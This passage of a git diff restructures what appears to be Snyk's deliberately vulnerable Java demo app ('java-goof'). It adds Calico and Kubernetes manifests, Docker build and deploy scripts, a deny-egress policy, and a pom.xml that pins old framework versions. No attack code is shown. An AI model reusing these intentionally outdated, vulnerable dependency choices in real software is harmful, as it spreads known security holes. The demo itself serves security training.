globalnetworksets + - networkpolicies + - networksets + - clusterinformations + - hostendpoints + - blockaffinities + - caliconodestatuses + verbs: + - get + - list + - watch + # Calico must create and update some CRDs on startup. + - apiGroups: ["crd.projectcalico.org"] + resources: + - ippools + - felixconfigurations + - clusterinformations + verbs: + - create + - update + # Calico must update some CRDs. + - apiGroups: [ "crd.projectcalico.org" ] + resources: + - caliconodestatuses + verbs: + - update + # Calico stores some configuration information on the node. + - apiGroups: [""] + resources: + - nodes + verbs: + - get + - list + - watch + # These permissions are only required for upgrade from v2.6, and can + # be removed after upgrade or on fresh installations. + - apiGroups: ["crd.projectcalico.org"] + resources: + - bgpconfigurations + - bgppeers + verbs: + - create + - update + # These permissions are required for Calico CNI to perform IPAM allocations. + - apiGroups: ["crd.projectcalico.org"] + resources: + - blockaffinities + - ipamblocks + - ipamhandles + verbs: + - get + - list + - create + - update + - delete + - apiGroups: ["crd.projectcalico.org"] + resources: + - ipamconfigs + verbs: + - get + # Block affinities must also be watchable by confd for route aggregation. + - apiGroups: ["crd.projectcalico.org"] + resources: + - blockaffinities + verbs: + - watch + # The Calico IPAM migration needs to get daemonsets. These permissions can be + # removed if not upgrading from an installation using host-local IPAM. + - apiGroups: ["apps"] + resources: + - daemonsets + verbs: + - get + +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: calico-node +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: calico-node +subjects: +- kind: ServiceAccount + name: calico-node + namespace: kube-system + +--- +# Source: calico/templates/calico-node.yaml +# This manifest installs the calico-node container, as well +# as the CNI plugins and network config on +# each master and worker node in a Kubernetes cluster. +kind: DaemonSet +apiVersion: apps/v1 +metadata: + name: calico-node + namespace: kube-system + labels: + k8s-app: calico-node +spec: + selector: + matchLabels: + k8s-app: calico-node + updateStrategy: + type: RollingUpdate + rollingUpdate: + maxUnavailable: 1 + template: + metadata: + labels: + k8s-app: calico-node + spec: + nodeSelector: + kubernetes.io/os: linux + hostNetwork: true + tolerations: + # Make sure calico-node gets scheduled on all nodes. + - effect: NoSchedule + operator: Exists + # Mark the pod as a critical add-on for rescheduling. + - key: CriticalAddonsOnly + operator: Exists + - effect: NoExecute + operator: Exists + serviceAccountName: calico-node + # Minimize downtime during a rolling upgrade or deletion; tell Kubernetes to do a "force + # deletion": https://kubernetes.io/docs/concepts/workloads/pods/pod/#termination-of-pods. + terminationGracePeriodSeconds: 0 + priorityClassName: system-node-critical + initContainers: + # This container performs upgrade from host-local IPAM to calico-ipam. + # It can be deleted if this is a fresh installation, or if you have already + # upgraded to use calico-ipam. + - name: upgrade-ipam + image: docker.io/calico/cni:v3.21.2 + command: ["/opt/cni/bin/calico-ipam", "-upgrade"] + envFrom: + - configMapRef: + # Allow KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT to be overridden for eBPF mode. + name: kubernetes-services-endpoint + optional: true + env: + - name: KUBERNETES_NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: CALICO_NETWORKING_BACKEND + valueFrom: + configMapKeyRef: + name: calico-config + key: calico_backend + volumeMounts: + - mountPath: /var/lib/cni/networks + name: host-local-net-dir + - mountPath: /host/opt/cni/bin + name: cni-bin-dir + securityContext: + privileged: true + # This container installs the CNI binaries + # and CNI network config file on each node. + - name: install-cni + image: docker.io/calico/cni:v3.21.2 + command: ["/opt/cni/bin/install"] + envFrom: + - configMapRef: + # Allow KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT to be overridden for eBPF mode. + name: kubernetes-services-endpoint + optional: true + env: + # Name of the CNI config file to create. + - name: CNI_CONF_NAME + value: "10-calico.conflist" + # The CNI network config to install on each node. + - name: CNI_NETWORK_CONFIG + valueFrom: + configMapKeyRef: + name: calico-config + key: cni_network_config + # Set the hostname based on the k8s node name. + - name: KUBERNETES_NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + # CNI MTU Config variable + - name: CNI_MTU + valueFrom: + configMapKeyRef: + name: calico-config + key: veth_mtu + # Prevents the container from sleeping forever. + - name: SLEEP + value: "false" + volumeMounts: + - mountPath: /host/opt/cni/bin + name: cni-bin-dir + - mountPath: /host/etc/cni/net.d + name: cni-net-dir + securityContext: + privileged: true + # Adds a Flex Volume Driver that creates a per-pod Unix Domain Socket to allow Dikastes + # to communicate with Felix over the Policy Sync API. + - name: flexvol-driver + image: docker.io/calico/pod2daemon-flexvol:v3.21.2 + volumeMounts: + - name: flexvol-driver-host + mountPath: /host/driver + securityContext: + privileged: true + containers: + # Runs calico-node container on each Kubernetes node. This + # container programs network policy and routes on each + # host. + - name: calico-node + image: docker.io/calico/node:v3.21.2 + envFrom: + - configMapRef: + # Allow KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT to be overridden for eBPF mode. + name: kubernetes-services-endpoint + optional: true + env: + # Use Kubernetes API as the backing datastore. + - name: DATASTORE_TYPE + value: "kubernetes" + # Wait for the datastore. + - name: WAIT_FOR_DATASTORE + value: "true" + # Set based on the k8s node name. + - name: NODENAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + # Choose the backend to use. + - name: CALICO_NETWORKING_BACKEND + valueFrom: + configMapKeyRef: + name: calico-config + key: calico_backend + # Cluster type to identify the deployment type + - name: CLUSTER_TYPE + value: "k8s,bgp" + # Auto-detect the BGP IP address. + - name: IP + value: "autodetect" + # Enable IPIP + - name: CALICO_IPV4POOL_IPIP + value: "Always" + # Enable or Disable VXLAN on the default IP pool. + - name: CALICO_IPV4POOL_VXLAN + value: "Never" + # Set MTU for tunnel device used if ipip is enabled + - name: FELIX_IPINIPMTU + valueFrom: + configMapKeyRef: + name: calico-config + key: veth_mtu + # Set MTU for the VXLAN tunnel device. + - name: FELIX_VXLANMTU + valueFrom: + configMapKeyRef: + name: calico-config + key: veth_mtu + # Set MTU for the Wireguard tunnel device. + - name: FELIX_WIREGUARDMTU + valueFrom: + configMapKeyRef: + name: calico-config + key: veth_mtu + # The default IPv4 pool to create on startup if none exists. Pod IPs will be + # chosen from this range. Changing this value after installation will have + # no effect. This should fall within `--cluster-cidr`. + # - name: CALICO_IPV4POOL_CIDR + # value: "192.168.0.0/16" + # Disable file logging so `kubectl logs` works. + - name: CALICO_DISABLE_FILE_LOGGING + value: "true" + # Set Felix endpoint to host default action to ACCEPT. + - name: FELIX_DEFAULTENDPOINTTOHOSTACTION + value: "ACCEPT" + # Disable IPv6 on Kubernetes. + - name: FELIX_IPV6SUPPORT + value: "false" + - name: FELIX_HEALTHENABLED + value: "true" + securityContext: + privileged: true + resources: + requests: + cpu: 250m + lifecycle: + preStop: + exec: + command: + - /bin/calico-node + - -shutdown + livenessProbe: + exec: + command: + - /bin/calico-node + - -felix-live + - -bird-live + periodSeconds: 10 + initialDelaySeconds: 10 + failureThreshold: 6 + timeoutSeconds: 10 + readinessProbe: + exec: + command: + - /bin/calico-node + - -felix-ready + - -bird-ready + periodSeconds: 10 + timeoutSeconds: 10 + volumeMounts: + # For maintaining CNI plugin API credentials. + - mountPath: /host/etc/cni/net.d + name: cni-net-dir + readOnly: false + - mountPath: /lib/modules + name: lib-modules + readOnly: true + - mountPath: /run/xtables.lock + name: xtables-lock + readOnly: false + - mountPath: /var/run/calico + name: var-run-calico + readOnly: false + - mountPath: /var/lib/calico + name: var-lib-calico + readOnly: false + - name: policysync + mountPath: /var/run/nodeagent + # For eBPF mode, we need to be able to mount the BPF filesystem at /sys/fs/bpf so we mount in the + # parent directory. + - name: sysfs + mountPath: /sys/fs/ + # Bidirectional means that, if we mount the BPF filesystem at /sys/fs/bpf it will propagate to the host. + # If the host is known to mount that filesystem already then Bidirectional can be omitted. + mountPropagation: Bidirectional + - name: cni-log-dir + mountPath: /var/log/calico/cni + readOnly: true + volumes: + # Used by calico-node. + - name: lib-modules + hostPath: + path: /lib/modules + - name: var-run-calico + hostPath: + path: /var/run/calico + - name: var-lib-calico + hostPath: + path: /var/lib/calico + - name: xtables-lock + hostPath: + path: /run/xtables.lock + type: FileOrCreate + - name: sysfs + hostPath: + path: /sys/fs/ + type: DirectoryOrCreate + # Used to install CNI. + - name: cni-bin-dir + hostPath: + path: /opt/cni/bin + - name: cni-net-dir + hostPath: + path: /etc/cni/net.d + # Used to access CNI logs. + - name: cni-log-dir + hostPath: + path: /var/log/calico/cni + # Mount in the directory for host-local IPAM allocations. This is + # used when upgrading from host-local to calico-ipam, and can be removed + # if not using the upgrade-ipam init container. + - name: host-local-net-dir + hostPath: + path: /var/lib/cni/networks + # Used to create per-pod Unix Domain Sockets + - name: policysync + hostPath: + type: DirectoryOrCreate + path: /var/run/nodeagent + # Used to install Flex Volume Driver + - name: flexvol-driver-host + hostPath: + type: DirectoryOrCreate + path: /usr/libexec/kubernetes/kubelet-plugins/volume/exec/nodeagent~uds +--- + +apiVersion: v1 +kind: ServiceAccount +metadata: + name: calico-node + namespace: kube-system + +--- +# Source: calico/templates/calico-kube-controllers.yaml +# See https://github.com/projectcalico/kube-controllers +apiVersion: apps/v1 +kind: Deployment +metadata: + name: calico-kube-controllers + namespace: kube-system + labels: + k8s-app: calico-kube-controllers +spec: + # The controllers can only have a single active instance. + replicas: 1 + selector: + matchLabels: + k8s-app: calico-kube-controllers + strategy: + type: Recreate + template: + metadata: + name: calico-kube-controllers + namespace: kube-system + labels: + k8s-app: calico-kube-controllers + spec: + nodeSelector: + kubernetes.io/os: linux + tolerations: + # Mark the pod as a critical add-on for rescheduling. + - key: CriticalAddonsOnly + operator: Exists + - key: node-role.kubernetes.io/master + effect: NoSchedule + serviceAccountName: calico-kube-controllers + priorityClassName: system-cluster-critical + containers: + - name: calico-kube-controllers + image: docker.io/calico/kube-controllers:v3.21.2 + env: + # Choose which controllers to run. + - name: ENABLED_CONTROLLERS + value: node + - name: DATASTORE_TYPE + value: kubernetes + livenessProbe: + exec: + command: + - /usr/bin/check-status + - -l + periodSeconds: 10 + initialDelaySeconds: 10 + failureThreshold: 6 + timeoutSeconds: 10 + readinessProbe: + exec: + command: + - /usr/bin/check-status + - -r + periodSeconds: 10 + +--- + +apiVersion: v1 +kind: ServiceAccount +metadata: + name: calico-kube-controllers + namespace: kube-system + +--- + +# This manifest creates a Pod Disruption Budget for Controller to allow K8s Cluster Autoscaler to evict + +apiVersion: policy/v1beta1 +kind: PodDisruptionBudget +metadata: + name: calico-kube-controllers + namespace: kube-system + labels: + k8s-app: calico-kube-controllers +spec: + maxUnavailable: 1 + selector: + matchLabels: + k8s-app: calico-kube-controllers + +--- +# Source: calico/templates/calico-etcd-secrets.yaml + +--- +# Source: calico/templates/calico-typha.yaml + +--- +# Source: calico/templates/configure-canal.yaml + + diff --git a/todolist-goof/k8s/imagebuild.sh b/todolist-goof/k8s/imagebuild.sh new file mode 100755 index 0000000000..c2c0c778e8 --- /dev/null +++ b/todolist-goof/k8s/imagebuild.sh @@ -0,0 +1,9 @@ +#!/usr/bin/env bash +read -e -i "${DOCKER_ACCOUNT}" -p "Please enter your DockerHub user/account name: " input +name="${input:-$DOCKER_ACCOUNT}" + +echo "📦 Building image ${DOCKER_ACCOUNT}/java-goof:latest ..." +docker build -t ${DOCKER_ACCOUNT}/java-goof:latest . +echo +echo "🚚 Pushing image to DockerHub..." +docker push ${DOCKER_ACCOUNT}/java-goof:latest diff --git a/todolist-goof/k8s/java-goof.yaml b/todolist-goof/k8s/java-goof.yaml new file mode 100644 index 0000000000..3a7215cc36 --- /dev/null +++ b/todolist-goof/k8s/java-goof.yaml @@ -0,0 +1,38 @@ +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: goof + name: goof + namespace: default +spec: + replicas: 1 + selector: + matchLabels: + app: goof + template: + metadata: + labels: + app: goof + spec: + containers: + - image: ${DOCKER_ACCOUNT}/java-goof:latest + imagePullPolicy: Always + name: java-goof + restartPolicy: Always +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: goof + name: goof +spec: + type: LoadBalancer + ports: + - port: 80 + protocol: TCP + targetPort: 8080 + selector: + app: goof diff --git a/todolist-goof/k8s/noegress.yaml b/todolist-goof/k8s/noegress.yaml new file mode 100644 index 0000000000..63843025c2 --- /dev/null +++ b/todolist-goof/k8s/noegress.yaml @@ -0,0 +1,15 @@ +--- +apiVersion: networking.k8s.io/v1 +kind: NetworkPolicy +metadata: + name: deny-egress +spec: + podSelector: {} + policyTypes: + - Egress + egress: + - ports: + - port: 53 + protocol: UDP + - port: 53 + protocol: TCP diff --git a/todolist-goof/k8s/shutdown.sh b/todolist-goof/k8s/shutdown.sh new file mode 100755 index 0000000000..a7bfa55822 --- /dev/null +++ b/todolist-goof/k8s/shutdown.sh @@ -0,0 +1,4 @@ +#!/usr/bin/env bash +MYDIR=$(dirname $0) +echo "Removing app from kubernetes..." +kubectl delete -f $MYDIR/java-goof.yaml diff --git a/todolist-goof/k8s/startup.sh b/todolist-goof/k8s/startup.sh new file mode 100755 index 0000000000..ce97ea83cc --- /dev/null +++ b/todolist-goof/k8s/startup.sh @@ -0,0 +1,13 @@ +#!/usr/bin/env bash +MYDIR=$(dirname $0) +read -e -i "${DOCKER_ACCOUNT}" -p "Please enter your DockerHub user/account name: " input +name="${input:-$DOCKER_ACCOUNT}" + +cat $MYDIR/java-goof.yaml | envsubst | kubectl apply -f - + +echo "⌚️ Waiting for pod deployment..." +kubectl wait --for=condition=ready pod \ + --selector=app=goof \ + --timeout=90s + +echo "Done." diff --git a/out/production/localhost/SESSIONS.ser b/todolist-goof/out/production/localhost/SESSIONS.ser similarity index 100% rename from out/production/localhost/SESSIONS.ser rename to todolist-goof/out/production/localhost/SESSIONS.ser diff --git a/todolist-goof/pom.xml b/todolist-goof/pom.xml new file mode 100644 index 0000000000..4df79d1b1b --- /dev/null +++ b/todolist-goof/pom.xml @@ -0,0 +1,101 @@ + + 4.0.0 + + io.github.snyk + todolist-mvc + 0.0.1-SNAPSHOT + Java Goof :: TodoList Goof + A vulnerable demo application, initially based on Ben Hassine's TodoMVC. + https://github.com/snyk/java-goof + + + 3.2.6.RELEASE + 4.3.7.Final + 5.3.8 + 2.3.20 + UTF-8 + + + + todolist-core + todolist-web-common + todolist-web-struts + + pom + + + + javax.xml.bind + jaxb-api + 2.3.0 + + + com.sun.xml.bind + jaxb-core + 2.3.0 + + + com.sun.xml.bind + jaxb-impl + 2.3.0 + + + + + + MIT License + http://opensource.org/licenses/mit-license.php + + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.2 + + true + 1.7 + 1.7 + true + + + + org.apache.maven.plugins + maven-dependency-plugin + 2.9 + + + install + install + + sources + + + + + + org.apache.maven.plugins + maven-war-plugin + 3.2.3 + + todolist + + + + org.apache.tomcat.maven + tomcat7-maven-plugin + 2.2 + + target/todolist.war + / + + + + + + + diff --git a/src/site/screenshots/todolist-home.png b/todolist-goof/src/site/screenshots/todolist-home.png similarity index 100% rename from src/site/screenshots/todolist-home.png rename to todolist-goof/src/site/screenshots/todolist-home.png diff --git a/src/site/screenshots/todolist-index.png b/todolist-goof/src/site/screenshots/todolist-index.png similarity index 100% rename from src/site/screenshots/todolist-index.png rename to todolist-goof/src/site/screenshots/todolist-index.png diff --git a/src/site/screenshots/todolist-search.png b/todolist-goof/src/site/screenshots/todolist-search.png similarity index 100% rename from src/site/screenshots/todolist-search.png rename to todolist-goof/src/site/screenshots/todolist-search.png diff --git a/src/site/screenshots/todolist-signin.png b/todolist-goof/src/site/screenshots/todolist-signin.png similarity index 100% rename from src/site/screenshots/todolist-signin.png rename to todolist-goof/src/site/screenshots/todolist-signin.png diff --git a/src/site/template/about.html b/todolist-goof/src/site/template/about.html similarity index 100% rename from src/site/template/about.html rename to todolist-goof/src/site/template/about.html diff --git a/src/site/template/account.html b/todolist-goof/src/site/template/account.html similarity index 100% rename from src/site/template/account.html rename to todolist-goof/src/site/template/account.html diff --git a/src/site/template/createTodo.html b/todolist-goof/src/site/template/createTodo.html similarity index 100% rename from src/site/template/createTodo.html rename to todolist-goof/src/site/template/createTodo.html diff --git a/src/site/template/home.html b/todolist-goof/src/site/template/home.html similarity index 100% rename from src/site/template/home.html rename to todolist-goof/src/site/template/home.html diff --git a/src/site/template/index.html b/todolist-goof/src/site/template/index.html similarity index 100% rename from src/site/template/index.html rename to todolist-goof/src/site/template/index.html diff --git a/src/site/template/login-error.html b/todolist-goof/src/site/template/login-error.html similarity index 100% rename from src/site/template/login-error.html rename to todolist-goof/src/site/template/login-error.html diff --git a/src/site/template/login.html b/todolist-goof/src/site/template/login.html similarity index 100% rename from src/site/template/login.html rename to todolist-goof/src/site/template/login.html diff --git a/src/site/template/register.html b/todolist-goof/src/site/template/register.html similarity index 100% rename from src/site/template/register.html rename to todolist-goof/src/site/template/register.html diff --git a/src/site/template/searchTodo.html b/todolist-goof/src/site/template/searchTodo.html similarity index 100% rename from src/site/template/searchTodo.html rename to todolist-goof/src/site/template/searchTodo.html diff --git a/src/site/template/static/css/bootstrap.min.css b/todolist-goof/src/site/template/static/css/bootstrap.min.css similarity index 100% rename from src/site/template/static/css/bootstrap.min.css rename to todolist-goof/src/site/template/static/css/bootstrap.min.css diff --git a/src/site/template/static/css/datepicker.css b/todolist-goof/src/site/template/static/css/datepicker.css similarity index 100% rename from src/site/template/static/css/datepicker.css rename to todolist-goof/src/site/template/static/css/datepicker.css diff --git a/src/site/template/static/img/glyphicons-halflings-white.png b/todolist-goof/src/site/template/static/img/glyphicons-halflings-white.png similarity index 100% rename from src/site/template/static/img/glyphicons-halflings-white.png rename to todolist-goof/src/site/template/static/img/glyphicons-halflings-white.png diff --git a/src/site/template/static/img/glyphicons-halflings.png b/todolist-goof/src/site/template/static/img/glyphicons-halflings.png similarity index 100% rename from src/site/template/static/img/glyphicons-halflings.png rename to todolist-goof/src/site/template/static/img/glyphicons-halflings.png diff --git a/src/site/template/static/img/todolist.ico b/todolist-goof/src/site/template/static/img/todolist.ico similarity index 100% rename from src/site/template/static/img/todolist.ico rename to todolist-goof/src/site/template/static/img/todolist.ico diff --git a/src/site/template/static/img/todolist.jpg b/todolist-goof/src/site/template/static/img/todolist.jpg similarity index 100% rename from src/site/template/static/img/todolist.jpg rename to todolist-goof/src/site/template/static/img/todolist.jpg diff --git a/src/site/template/static/js/bootstrap-datepicker.js b/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js similarity index 100% rename from src/site/template/static/js/bootstrap-datepicker.js rename to todolist-goof/src/site/template/static/js/bootstrap-datepicker.js diff --git a/src/site/template/static/js/bootstrap.min.js b/todolist-goof/src/site/template/static/js/bootstrap.min.js similarity index 100% rename from src/site/template/static/js/bootstrap.min.js rename to todolist-goof/src/site/template/static/js/bootstrap.min.js diff --git a/src/site/template/static/js/jquery-1.10.2.min.js b/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js similarity index 100% rename from src/site/template/static/js/jquery-1.10.2.min.js rename to todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js diff --git a/src/site/template/updateTodo.html b/todolist-goof/src/site/template/updateTodo.html similarity index 100% rename from src/site/template/updateTodo.html rename to todolist-goof/src/site/template/updateTodo.html diff --git a/todolist-core/pom.xml b/todolist-goof/todolist-core/pom.xml similarity index 97% rename from todolist-core/pom.xml rename to todolist-goof/todolist-core/pom.xml index 0ad71230c6..aeb2068be5 100644 --- a/todolist-core/pom.xml +++ b/todolist-goof/todolist-core/pom.xml @@ -3,14 +3,14 @@ todolist-mvc io.github.snyk - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT 4.0.0 todolist-core jar - todolist-core + Java Goof :: Todolist Goof :: Todolist Core diff --git a/todolist-core/src/main/java/io/github/todolist/core/Statics.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/Statics.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/domain/User.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/domain/User.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java diff --git a/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java b/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java similarity index 100% rename from todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java rename to todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java diff --git a/todolist-core/src/main/resources/META-INF/persistence.xml b/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml similarity index 100% rename from todolist-core/src/main/resources/META-INF/persistence.xml rename to todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml diff --git a/todolist-core/src/main/resources/META-INF/spring/application-context.xml b/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml similarity index 100% rename from todolist-core/src/main/resources/META-INF/spring/application-context.xml rename to todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml diff --git a/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml b/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml similarity index 100% rename from todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml rename to todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml diff --git a/todolist-core/src/main/resources/config/data.sql b/todolist-goof/todolist-core/src/main/resources/config/data.sql similarity index 100% rename from todolist-core/src/main/resources/config/data.sql rename to todolist-goof/todolist-core/src/main/resources/config/data.sql diff --git a/todolist-core/src/main/resources/config/database.properties b/todolist-goof/todolist-core/src/main/resources/config/database.properties similarity index 100% rename from todolist-core/src/main/resources/config/database.properties rename to todolist-goof/todolist-core/src/main/resources/config/database.properties diff --git a/todolist-core/src/main/resources/config/hibernate.properties b/todolist-goof/todolist-core/src/main/resources/config/hibernate.properties similarity index 100% rename from todolist-core/src/main/resources/config/hibernate.properties rename to todolist-goof/todolist-core/src/main/resources/config/hibernate.properties diff --git a/todolist-core/src/main/resources/config/schema.sql b/todolist-goof/todolist-core/src/main/resources/config/schema.sql similarity index 100% rename from todolist-core/src/main/resources/config/schema.sql rename to todolist-goof/todolist-core/src/main/resources/config/schema.sql diff --git a/todolist-core/src/main/resources/log4j.properties b/todolist-goof/todolist-core/src/main/resources/log4j.properties similarity index 100% rename from todolist-core/src/main/resources/log4j.properties rename to todolist-goof/todolist-core/src/main/resources/log4j.properties diff --git a/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java b/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java similarity index 100% rename from todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java rename to todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java diff --git a/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java b/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java similarity index 100% rename from todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java rename to todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java diff --git a/todolist-web-common/pom.xml b/todolist-goof/todolist-web-common/pom.xml similarity index 92% rename from todolist-web-common/pom.xml rename to todolist-goof/todolist-web-common/pom.xml index 2b85167928..59b055ec94 100644 --- a/todolist-web-common/pom.xml +++ b/todolist-goof/todolist-web-common/pom.xml @@ -3,14 +3,14 @@ todolist-mvc io.github.snyk - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT 4.0.0 todolist-web-common jar - todolist-web-common + Java Goof :: Todolist Goof :: Todolist Web Common UTF-8 @@ -38,7 +38,7 @@ io.github.snyk todolist-core - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT diff --git a/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java b/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java similarity index 100% rename from todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java rename to todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java diff --git a/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java b/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java similarity index 100% rename from todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java rename to todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java diff --git a/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java b/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java similarity index 100% rename from todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java rename to todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java diff --git a/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java b/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java similarity index 100% rename from todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java rename to todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java diff --git a/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java b/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java similarity index 100% rename from todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java rename to todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java diff --git a/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java b/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java similarity index 100% rename from todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java rename to todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java diff --git a/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java b/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java similarity index 100% rename from todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java rename to todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java diff --git a/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java 